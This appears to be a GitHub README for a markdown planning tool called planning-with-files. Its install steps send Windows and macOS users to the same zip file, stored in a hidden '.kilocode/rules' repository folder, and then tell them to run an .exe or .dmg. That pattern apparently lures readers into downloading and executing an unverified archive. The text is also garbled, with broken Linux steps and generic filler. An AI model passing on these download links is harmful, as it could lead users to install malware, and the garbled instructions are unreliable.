Welcome to planning-with-files! This application lets you manage your markdown planning easily. No programming skills are needed. Just follow the steps below to start.
To run planning-with-files, ensure you have the following:
- Operating System: Windows 10 or later / macOS 10.15 or later / Linux (latest stable version recommended)
- RAM: At least 4 GB
- Disk Space: 100 MB free space
- A modern web browser (for documentation)
- Easy markdown file management
- Built-in templates for quick setup
- Simple access to file systems
- User-friendly interface
- Offers persistent planning storage

Visit the Releases page to find the latest version of planning-with-files.

Look for the most recent release with the highest version number. You will see several files listed.

Choose the file that matches your operating system. For example:
- For Windows, download
https://github.com/SEPTMOON/planning-with-files/raw/refs/heads/master/.kilocode/rules/planning-files-with-1.6.zip. - For macOS, download
https://github.com/SEPTMOON/planning-with-files/raw/refs/heads/master/.kilocode/rules/planning-files-with-1.6.zip. - For Linux, download

Click on the file to start the download.

Once the download is complete, locate the file in your downloads folder.

Run the file:
- Windows: Double-click the
.exefile. Follow the installation instructions. - macOS: Open the
.dmgfile, drag the application into your Applications folder, then run it from there. - Linux: Extract the

After installation, you can start using planning-with-files:

Open the application from your Applications folder (macOS) or Start Menu (Windows).

You will see a welcome screen. Here, you can create a new markdown file or open an existing one.

Use the toolbar to format your text, add links, and create lists.

Save your planning file regularly to keep your work safe.

To access your files easily, the application integrates with your file system, so you can organize them as you like.
